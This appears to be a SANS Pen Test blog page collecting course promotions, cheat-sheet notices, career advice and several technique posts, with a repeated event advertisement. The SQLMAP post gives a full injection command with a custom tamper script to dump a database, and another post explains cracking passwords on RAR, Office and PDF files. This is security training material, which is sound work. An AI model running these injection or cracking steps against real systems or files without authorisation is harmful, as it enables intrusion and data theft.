SANS Pen Test Challenge Coin: SEC460

 

SEC460Coin

With every SANS Pen Test Challenge Coin comes a story. In addition to symbolizing achievement and knowledge, a Pen Test Challenge Coin is a physical manifestation of the keyboard skills demonstrated by the winners of our course’s Capture-the-Flag exercise.

The front of the SEC460: Enterprise Threat and Vulnerability Assessment challenge coin carries the SEC460 logo and title.  Great Vulnerability Assessors require an unwavering, burning passion to overcome the endless river of vulnerability data that major corporate networks are inundated with. The SEC460 logo represents this enthusiastic perseverance and attention to detail, the hallmarks of any excellent vulnerability team.

Hands-on labs and challenges are all conducted on a cyber range featuring the components of a large corporate environment. To represent this leap into the deep, dark, and unknown corners of large-scale network environments, the rear of the coin is adorned with an image of the HMS Enterprise – a vessel whose very name attests to daring military engagements.

The reverse side of the coin carries the SEC460 slogan: We cannot direct the wind, but we can adjust the sails. A defining and shared experience of all Vulnerability Assessors is the constantly shifting corporate environments we are charged to protect. While we may not be able to define the direction our organizations take, we are endowed with the opportunity to observe and think opportunistically in protecting them.
Like all other Pen Test coins before it, the SEC460: Enterprise Threat and Vulnerability Assessment challenge coin is its own challenge. The cipher itself connects to the nautical history of the image of the vessel above it. Who will be the first to crack it?

460FRONT

SEC460: Enterprise Threat and Vulnerability Assessment

How do you protect an organization with 1,000+ nodes from the crippling damage of wide-spread malware like WannaCry and NotPetya? Our brand-new 400-level course is designed to help you and your organization detect, prioritize, and mitigate enterprise-scale vulnerabilities.

Syllabus & Training Schedule: https://www.sans.org/course/enterprise-threat-vulnerability-assessment

Register for this brand-new course today!

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

SANS Cheat Sheet: Python 3

 

by: Mark Baggett

Python 2 – The end of the world as we know it.

It will happen. In the year 2020 an event will occur that will alter the course of information security forever. What is this apocalyptic event? The end of life for Python 2. Is it that big of a deal? Meh. I’m just being dramatic. As of 2020 they will stop releasing updates and patches to Python 2. But Python 2 isn’t going anywhere. If history has taught us lessons about what happens to unsupported software then we will continue to see it running critical infrastructure and hospital equipment for many years to come. Those programs that run in Python 2 interpreters today will continue to run in Python 2 interpreters well after 2020. Sadly today some organizations are still running old Python 2.5 interpreters despite the fact that it is now 13 years old and has serious security issues. It’s pretty safe to say that we will continue to see Python 2 for the foreseeable future.

That said, I think it is a little short sighted to continue to develop new tools and automation in Python 2 today. Today you should definitely be developing new code that works in Python 3. Any new tools you purchase and plan to use for more than a year should run in Python 3. You should also evaluate the risk associated with running that old Python 2 interpreter that may have security vulnerabilities once it is no longer supported vs updating your code to work with a supported interpreter. As you look to the future you should do that with Python 3 in your sights.

SANS SEC573: Automating information Security with Python course and the associated GPYC certification rides the Python2/Python3 fence along with the rest of the Industry. The course teaches you to build new tools for automation of common defensive, forensics and offensive task in Python 3. Developing new tools in Python 3 will set you up for success moving forward. We also covers what you need to know to convert your existing Python 2 code to Python 3. If you need to continue to use Python 2 we will teach you how to write code that is forward compatible to Python 3 so you are ready to switch when you are eventually forced to. In my opinion it isn’t really a choice between Python 2 and Python 3. The answer is both. We will supporting both versions for a while. In celebration of that fact here are the SEC573 Python2 and Python3 cheat sheets available for you to download and print! Enjoy!

 

DOWNLOAD – Python 2.7 Cheat Sheet

Python2_7

DOWNLOAD – Python 3 Cheat Sheet

Python3

 

Pen Test Cheat Sheets:

 

SANS Pen Test Training:

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

SANS Cheat Sheet: Netcat

 

by SANS Pen Test Team

We are adding another SANS Cheat Sheet to our arsenal of information security/penetration testing cheat sheets available here at the SANS Pen Test Blog. If you would like additional cheat sheets, click on the “cheatsheet” category or see below to find them all.

This cheat sheet is from our SANS SEC560: Network Penetration Testing and Ethical Hacking course, authored by SANS Fellow, Ed Skoudis. To learn Netcat in-depth along with many other tools, methods, and techniques of penetration testing, please consider taking our core pen testing course, SEC560.

What is Netcat… from the wiki:

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of connection its user could need and has a number of built-in capabilities.

Download PDF: netcat-cheat-sheet

Netcat1

 

Other Netcat Resources:

Bash’s Built-in Netcat Client

Netcat without -e? No problem!

 

Pen Test Cheat Sheets:

SANS Pen Test Training:

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

SANS Poster – White Board of Awesome Command Line Kung Fu (PDF Download)

 

by: SANS Pen Test Team

Imagine you are sitting at your desk and come across a great command line tip that will assist you in your career as an information security professional, so you jot the tip down on a note, post-it, or scrap sheet of paper and tape it to your white board… now imagine you do this all the time until your white board is completely full of useful tips you’ve found and can use daily.

That is the concept behind the SANS Pen Test Poster: White Board of Awesome Command Line Kung-Fu created by the SANS Pen Test Instructors. Each tip was submitted by the Pen Test Instructors and curated by SANS Fellow, Ed Skoudis.

We are giving you a complete white board full of tips you can use to become a better InfoSec professional.

Now it is available for you to download.

Download PDF – PENT-PSTR-WHITEBOARD-V3-0118_web.pdf

PENT-PSTR-WHITEBOARD-V3-0118_web_small

PENT-PSTR-WHITEBOARD-V3-0118_web_small_back

 

Additional Educational Posts based on the Poster:

Python:

“White Board” – Python – Python Debugger
“White Board” – Python – Python Reverse Shell!
“White Board” – Python – Pythonic Web Server
“White Board” – Python – Raw Shell -> Terminal
“White Board” – Python – Pythonic Web Client

Bash:

“White Board” – Bash – Useful IPv6 Pivot
“White Board” – Bash – Encrypted Exfil Channel!
“White Board” – Bash – What’s My Public IP Address?
“White Board” – Bash – Bash’s Built-In Netcat Client
“White Board” – Bash – Check Service Every Second
“White Board” – Bash – Make Output Easier to Read
“White Board” – Bash – Website Cloner
“White Board” – Bash – Sudo… Make Me a Sandwich
“White Board” – Bash – Find Juicy Stuff in File System

CMD.exe:

“White Board” – CMD.exe – C:\> netsh interface
“White Board” – CMD.exe – C:\> wmic process

PowerShell:

“White Board” – PowerShell – Add a Firewall Rule
“White Board” – PowerShell – Built-in Port Scanner!
“White Board” – PowerShell – Get Firewall Rules
“White Board” – PowerShell – One-Line Web Client
“White Board” – PowerShell – Ping Sweeper!
“White Board” – PowerShell – Find Juicy Stuff in the File System

 

Desktop Wallpapers based on Poster:

Bash, PowerShell, Python…

Python_1280x1024(example)

 

SANS Pen Test Training:

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

So You Wanna Be a Pen Tester? 3 Paths To Consider (Updated)

Tips for Entering the Penetration Testing Field

By Ed Skoudis

It’s an exciting time to be a professional penetration tester. As malicious computer attackers amp up the number and magnitude of their breaches, the information security industry needs an enormous amount of help in proactively finding and resolving vulnerabilities. Penetration testers who are able to identify flaws, understand them, and demonstrate their business impact through careful exploitation are an important piece of the defensive puzzle.

In the courses I teach on penetration testing, I’m frequently asked about how someone can land their first job in the field after they’ve acquired the appropriate technical skills and gained a good understanding of methodologies. Also, over the past decade, I’ve counseled a lot of my friends and acquaintances as they’ve moved into various penetration testing jobs. Although there are many different paths to pen test nirvana, let’s zoom into three of the most promising. It’s worth noting that these three paths aren’t mutually exclusive either. I know many people who started on the first path, jumped to the second mid-way, and later found themselves on path #3. Or, you can jumble them up in arbitrary order.

Path A: General Enterprise Security Practitioner Moving to Penetration Testing

First, you could parlay a job in the security group of an enterprise (whether a corporate, government, or educational position) into vulnerability assessment and then penetration testing. For example, today, you may be a security auditor, administrator, analyst, or a member of a Security Operations Center (SOC) team. Tell your management that you are keenly interested in vulnerability assessment and penetration testing, and offer your support in existing projects associated with those tasks. You might have to start by taking one for the team and putting in your own hours in helping out, without getting a break from your “regular” job. Consider this extra time an investment in yourself. At first, you could help with tasks such as project scoping, false positive reduction, and remediation verification. Later, offer help in preparing a high-quality penetration testing report. Over the space of several months or even a year, you’ll demonstrate increasing skills and can ask management or other groups in your enterprise for a move more directly in the heart of penetration testing work.

Path B: Working for a Company or Division that Focuses on Penetration Testing

There are many companies that provide third-party penetration testing services to other companies, including organizations such as Verizon, Trustwave, and FishNet Security. Many of these organizations are looking to hire exceptional penetration testers, especially those who have experience. If you have no direct penetration testing experience, you may still want to try your hand by applying for a junior role in such organizations. A solid background in secure networking, development, or operations will prove helpful. But, if experience is absolutely required, consider moving through Paths A or C to hone your skills before jumping to Path B.

Path C: Going Out on Your Own

If you are more entrepreneurially minded, you may want to consider forming your own small company on the side to do vulnerability assessment for local small businesses, such as a local florist or auto mechanic. Start with just vulnerability assessment services, and build your skills there before going into full-blown penetration testing. There are a couple of huge caveats to take into account with this path, though. First off, make sure you get a good draft contract and statement of work template drawn up by a lawyer to limit your liability. Next, get some liability and errors & omissions insurance for penetration testing. Such protection could cost a few thousand dollars annually, but is vital in doing this kind of work. Once you’ve built your vulnerability assessment capabilities, you may want to gradually start looking at carefully exploiting discovered flaws (when explicitly allowed in your Statements of Work) to move from vulnerability assessment to penetration testing. After your small business is humming, you may decide to stick with this path, growing your business, or jump into Paths A or B.

Regardless of whether you go down paths A, B, C, or your own unique approach to entering the penetration testing industry, always keep in mind that your reputation and trustworthiness are paramount in the information security field. Your name is your personal brand, so work hard, be honest, and always maintain your integrity. Additionally, build yourself a lab of four or five virtual machines so you can practice your technical skills regularly, running scanners, exploitation tools, and sniffers so you can understand your craft at a fine-grained level. Learn a scripting language such as Python or Ruby so you can start automating various aspects of your tasks and even extend the capabilities of tools such as the Metasploit framework. And, most of all, give back to the community by writing a blog, sharing your ideas and techniques, and releasing scripts and tools you’ve created. You see, to excel in pen testing, you can’t think of it as a job. It is a way of life. Building a sterling reputation and contributing to others is not only beneficial to the community, but it will provide many direct and indirect benefits to you as you move down your path from new penetration tester to seasoned professional.

Additional SANS Penetration Testing Resources

Watch: WEBCAST – So, You Wanna Be a Pen Tester?

EdSkoudis_SoYouWannaBeAPenTester_06192018

Available Now!
Recorded: 6/19/2108
https://www.sans.org/webcasts/so-wanna-pen-tester-3-paths-106920

 

Upcoming SANS Pen Test Webcasts:

Pen Test Cheat Sheets:

SANS Pen Test Posters:

Build your Skills (Free):

SANS Penetration Testing Webcasts (YouTube):

SANS Pen Test Training:

–Ed.

https://twitter.com/edskoudis

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

SANS Poster: Building a Better Pen Tester – PDF Download

 

Blog Post by: SANS Pen Test Team

 

It’s here! It’s here! The NEW SANS Penetration Testing Curriculum Poster has arrived (in PDF format)!

This blog post is for the downloadable PDF version of the new “Blueprint: Building a Better Pen Tester” Poster created by the SANS Pen Test Curriculum.

The front of the poster is full of useful information directly from the brains of SANS Pen Test Instructors. These are the pen testing tips they share with the students of SANS SEC560: Network Penetration Testing and Ethical Hacking and our other pen testing, ethical hacking, exploit dev, and vulnerability assessment courses.

The back of the poster has a checklist for scoping and rules of engagement, command line commands for Metasploit, Scapy, Nmap, and PowerShell, and information about Slingshot and the SANS Pen Test Curriculum.

Our hope is, the knowledge contained in this poster will help you become a better pen tester. And if you aren’t currently a pen tester, that the information will you help you become a more informed information security professional.

Training: Learn ethical hacking and penetration testing with one of our world-class instructors by taking, SEC560: Network Penetration Testing and Ethical Hacking in person or online.

Download:

PENT-PSTR-SANS18-BP-V1-01

PENT-PSTR-SANS18-BP-V1-02

Download: PENT-PSTR-SANS18-BP-V1_web

 

SANS Webcast – Building A Better Pen Tester Poster

EdSkoudis_PenTestPoster_Blueprint_02_01092018

YouTube: https://youtu.be/feljUh5Q6V0

Desktop Wallpapers:

Click image for full-sized wallpaper file

Blueprint_Wallpaper_Pre-Eng&ReconPre-Engagement & Reconnaissance

 

Blueprint_Wallpaper_VA&PAVulnerability Analysis & Password Attacks

 

Blueprint_Wallpaper_Exp&Post-ExpExploitation & Post-Exploitation

 

Blueprint_Wallpaper_RE&ScopingRules of Engagement & Scoping Checklist

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

SCAPY Full Duplex Stream Reassembly

 

I recently had someone ask me how you can have scapy reassemble full duplex packets for you. That is what Wireshark does when you ask it to “Follow TCP Stream”. In SANS SEC573: Automating Information Security with Python we discuss how to use scapy’s native session reassembly capabilities, but its default behavior is to reassemble unidirectional streams. In other words, two separate sessions are created. One for traffic that flows from Host A to Host B and another for the traffic in the same session that flows form Host B to Host A. To use scapy’s native session reassembly you call a packet list’s .sessions() method which returns a Python dictionary of followed streams. They keys of that dictionary contain a string indicating who is communicating with who in the format "Protocol SourceIP:SourcePort > DestinationIP:DestinationPort". Its value in the dictionary is a list of all the packets that are part of that stream.

duplex_blogimage1

 

In this example you can tell by looking at the keys that there are two sessions. In the course we go into more detail about how to reassemble these packets to extract payloads so you can look for useful pieces of attack signatures. But, the question posed to me was “How can I do this with full duplex streams combining those two into a single session like Wireshark?” There are a couple of ways you could do this. One option is just to combine the two sets of packets.

duplex_blogimage2

 

This works well for a few packets, but at scale can be problematic. For example, if you step through a large file you have to keep track of which streams you already combined so that when you reach the 2nd half of the conversation you don’t process the same stream a second time. A better option is to pass the scapy PacketList session() method a function that tells it how to reassemble the packets in full duplex. The function will take in a single packet and returns a string that contains the relevant bits of data that uniquely identify the steam. Every packet in your list of packets that has the same string will be automatically grouped together into a stream by the sessions() method. This behaves sort of like a key function for Python’s sort capability. For our packets to be full duplex we need the string to be identical for both HOST A to HOST B and HOST B to HOST A communications. You can accomplish this by just sorting a list of the attributes that make our stream unique.  Here is a function called full_duplex() that will reassemble all of the same protocols that the default session assembly process currently supports but will do it with bi-directional streams.

duplex_blogimage3

 

To use the function pass the full_duplex function to the sessions() method and it will use it to reassemble your packets.

duplex_blogimage4

 

Here is an example of trying the full_duplex() function on a larger pcap file with multiple sessions.

duplex_blogimage5

 

You can see that without full_duplex you have 182 unidirectional streams and with full_duplex you have 91 bidirectional streams. Now, using various techniques you can reassemble the payload from the full duplex streams and search for evil, forensics data or useful pieces of information.  For more information on this and other techniques check out SANS SEC573: Automating Information Security with Python.

The Scapy Packet reassembly:

https://gist.github.com/MarkBaggett/d8933453f431c111169158ce7f4e2222#file-scapy_helper-py

  • Mark Baggett

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

SQLMAP Tamper Scripts for The Win

 

During a recent penetration test BURP Suite identified some blind SQL Injection vulnerabilities in a target website. Pointing SQLMAP at the website showed us no love and simply said it was unable to exploit the website. I had mentioned the SQLi issues to the customer and he said that previous penetration testers said they were unexploitable. We decided to take a closer look anyway. The URLs for the website looked rather odd.  I can’t talk specifically about the website in question, but the URIs looked something like this:

 

 

http://www.example.tgt/website.php?QnnyBZ4_ZB6qvm=xxxTcTc&k3mK4_ZQ6v=6V9A&UQK4_ZQ6v=qVllgrr

SQLMAP_Tamper_Script01

 

You’ll notice that the field names (underlined in RED) have very strange names.   At first I thought that these were just weird field names. Maybe the developer has some codenames for fields that I just didn’t understand. But then I noticed that the values (underlined in BLUE) were also very odd. None of the information on the URL made any sense to me. I grabbed a coworker and we spent some time trying to figure out what kind of weird encoding was being used. The web application had some useful functionality that make the translation pretty easy to figure out. If we put "AAAAAAAAA" into the ACCOUNT NUMBER field in the websites search page we saw that it redirected us to a web page with a URI  containing 'QnnyBZ4_ZB6qvm=QQQQQQQQQ'. When we searched for an ACCOUNT NUMBER of 'BBBBBBBBB" it took us to web page with a URI containing 'QnnyBZ4_ZB6qvm=qqqqqqqqq'. There was obviously some type of character substitution cipher being used on the URL. The maximum size for an account number was 9 characters. But with a few queries I could figure out the entire character set mapping. I searched for an ACCOUNT NUMBER of "ABCDEFGHI" and found a URI containing 'QnnyBZ4_ZB6qvm=QqnPvka03'. I searched for 'JKLMNOPQR' and found a URI containing 'QnnyBZ4_ZB6qvm=wMU6Zybjm'. I repeated this process for every upper, lower and numeric character and soon I had the following mapping of characters.

Normal Letters = ‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789’

Encrypted Letters = ‘QqnPvka03wMU6ZybjmK4BRSEWdVishgClpI1AouFNOJ9zrtL2Yef7Tc8GxDHX5’

Python makes translating between two sets of characters easy. Using Python 3 we can do the following:

 

blogimage1

 

This translated the word "HELLO" into "OvUUy" using the character mapping specified. The arguments for maketrans are the "FROM STRING" followed by the "TO STRING". Going in the other direction is simply a matter of reversing the parameters passed to str.maketrans() and passing (encrypted_letter, normal_letters)

 

blogimage2

 

In Python2 you have to import the string module because the maketrans function is stored there. But otherwise the syntax is the same.

blogimage3

 

Now I can decode the URLs! So we tried in on the URL we saw earlier.

blog1_NEW

 

Awesome. Now that is something I can understand. Now that we can freely encode and decode our attacks we had a bit more success with manual exploitation. But I’m lazy! I want SQLMAP to automate my attacks for me! If I don’t tell SQLMAP how to encode its injections it will not work against the website. SQLMAP tamper scripts are designed to do exactly that. SQLMAP is distributed with a set of "TAMPER" scripts to perform tasks like add a NULL byte to the end of injections or randomize the case of the letters in your query.  Creating a custom tamper script to do our character transposition is pretty simple. SQLMAP is using Python2 so we will have to import the string module.   But Looking at one of the other tamper scripts and using it as an example we quickly wrote the following:

 

tamper-script_new

We saved this new file a “custom_caesar.py” and placed it inside SQLMAP’s “tamper” directory. Then we pass the name of our script to the –tamper argument.

python sqlmap.py -u “https://www.example.tgt/webapp.php? QnnyBZ4_ZB6qvm=xxxTcTc&k3mK4_ZQ6v=6V9A&UQK4_ZQ6v=qVllgrr” –tamper=custom_caesar.py –dump

 

Then sit back and watch SQLMAP’s barrage of winning. A few lines of custom Python code took this vulnerability from “an unexploitable false positive” to a significant vulnerability that requires immediate attention. After using the tamper script we are able to access everything in the database with SQLMAP saving us hours of manual exploitation and encoding. And all it took was plugging 3 lines of custom Python code into an existing tamper script template.

Python is awesome and having the ability to use it and customize tools to meet your demands is incredibly powerful. Come check out SEC573: Automating Information Security with Python.

The SQLMAP Tamper Script

https://gist.github.com/MarkBaggett/49aca627205aebaa2be1811511dbc422#file-custom_caesar-py

  • Mark Baggett

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

How to Guide: Cracking into Piles of Files

by: Matt Edmondson

(Editor’s Note: this blog was originally submitted for posting on March 25th, but wasn’t posted until October 4th. We hope you enjoy this content and that Matt Edmondson continues to give freely of his knowledge to the blog.)

Password cracking is one of my favorite parts of information security. Many of us have built computer systems designed specifically for this task. We use tools like John the Ripper for quickie password cracking efforts and Hashcat for larger tasks but we usually sick these tools on cryptographic password hashes we obtain from hashdumps, database tables and tools such as Responder. One of the lessons we’ve learned from high profile breaches such as Sony is that it’s extremely common for users and organizations to also store passwords in document formats such as Microsoft Word and Excel.

In this post we’ll talk about why we use video cards instead of our CPUs to crack passwords and how we can use these same tools and techniques to help us get into password protected office documents and archive files that may contain a user’s complete list of passwords or other juicy information.

John the Ripper is often the first tool that information security practitioners play with. It’s free, easy to use and even tries to automatically detect what type of hashes you’re attempting to crack. John is available for Windows, Linux and OS X and is built into several Linux distributions like Kali. If you’ve never used John before and are using a Windows system, you can download it from http://www.openwall.com/john/ . I would recommend the “jumbo” windows binaries. The jumbo version of John supports more cryptographic hash formats than the regular version of John does as well as a few extra features. The windows binaries require zero setup outside of just extracting the files to a directory.

There is a blog post at https://www.tunnelsup.com/getting-started-cracking-password-hashes/ which gives a very quick overview of using John and has links to some password hashes as well as wordlists for use in password cracking.

After you start cracking passwords, you’ll probably get a strong, strong desire to start cracking them faster. The most common solution to this is to use a system with one or more graphics cards (GPUs) and use the GPUs to crack passwords instead of the computer’s CPU. While the jumbo version of John does support GPUs, the most popular tool for GPU password cracking is Haschat. It’s very well supported, constantly updated, free and can be downloaded from https://hashcat.net/hashcat/ . As long as your video card drivers are up to date, Hashcat should automatically detect your GPU and use it for cracking.

Underneath the surface, password cracking requires a lot of math. Graphics cards are able to perform math functions like these at extremely high rates of speed. Because of this, a tool which utilizes GPUs can crack passwords MUCH faster than a CPU can. How much faster? I made a password protected .RAR file for a quick comparison.

Utilizing John the ripper and my CPU to crack the password, I was making 174 guesses per second. This may sound like a lot but for password cracking, this is as slow as molasses.

pwcrackingtalk_01

The laptop I’m typing this post on has an integrated graphics card. These types of cards are usually the least powerful type of GPU for these purposes. Even so, Hashcat was able to use the card to make 1,432 guesses per second or over eight times faster than the CPU.

pwcrackingtalk_02

With a powerful video card, the speed increase is usually extremely large. A GTX 1080 Ti video card (currently over $500 on Amazon) is able to make over 50,000 guesses a second which is almost 300 times faster than CPU alone.

pwcrackingtalk_03

Getting started using GPUs to crack passwords is easy, but not necessarily cheap. If you have a system with a powerful graphics card, you already have everything you need. If you have a desktop computer sitting around you can probably buy a graphics card to put in it but you may have to upgrade the system’s power supply as well as high end cards tend to be power hungry.

If you’re on a budget you can buy a midrange video card like a GTX 1060 and still get a lot of bang for your buck. If money is no object, you can chain together multiple video cards and crack even faster. The Hashcat forums at https://hashcat.net/forum/ are a great place to check for performance benchmarks and ask advice.

These are all great options but we’re burying the lead here. If we point Hashcat at a RAR file to crack, it will look at us confused and politely let us know that it doesn’t see any hashes in the RAR file. There are isolated tools out there that will try to crack specific file types but we didn’t build a GPU password cracking rig to not use its power to crack so how do we get a hash from the RAR file? The answer is John the Ripper. Well, not John himself, but his friends.

In the latest version of John the Ripper there are approximately sixty add on applications and python scripts in the run directory designed for you to be able to point at a file for it to generate a hash.

pwcrackingtalk_04

I’ve tried a few different file formats over the years and have had relatively good luck. Here is file from winrar:

pwcrackingtalk_05

From excel 2013 (not that anyone stores their passwords in an office document):

pwcrackingtalk_06

And a PDF:

pwcrackingtalk_07

Once we have the hash we can then use Hashcat or any other tool we want to try to crack the password. If you’re curious what the hash for a specific type of file should look like, the Hashcat wiki has a great entry of example hashes at https://hashcat.net/wiki/doku.php?id=example_hashes.

pwcrackingtalk_08

So while a lot of us have gone away from using John the Ripper in an effort to take advantage of the power of GPU password cracking, we can still use him when we’re trying to get into password protected files that we commonly encounter on engagements.

There is a lot of overlap between the different realms of information security and one of the things I love most about teaching the SEC504: Hacker Tools, Techniques, Exploits, and Incident Handling for SANS is getting a chance to look at techniques from both an offensive point of view as well as a defensive perspective. Utilizing a GPU to access password protected documents can provide the keys to the kingdom on a penetration test, or a vital piece of information while performing digital forensics work.

Matt Edmondson
SANS Instructor
Twitter: https://twitter.com/matt0177

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Modern Web Application Penetration Testing Part 2, Hash Length Extension Attacks

By: Adrien de Beaupre

I will be teaching SANS SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques at many events this year, I am also the co-author for the course. AKA the most advanced web app pentest course on the planet, probably the galaxy! This is one of the many techniques that I will be exploring in this series of posts.

I had the opportunity to sit with my friend Ron Bowes @iagox86 a while back to talk about SEC642 content and the state of web application penetration testing in general. He mentioned hash length extension attacks, and that coincidentally he had written the absolute best tool to exploit it! Definitely something that we could consider adding. Ron has also done writeups for CTF challenges that can be solved using his tool.

So I have some of the ingredients that we can talk about. We have a topic, we have a tool, and all that we need is a vulnerable application. We found a couple that had been used in CTFs, and one that also included some other interesting crypto challenges called CryptOMG by SpiderLabs. They published the solutions to the first and second challenges on their blog. This is the solution to the fifth challenge which is a hash length extension attack, and of course we will use hash_extender to do so. Installing CryptOMG is covered in Appendix A.

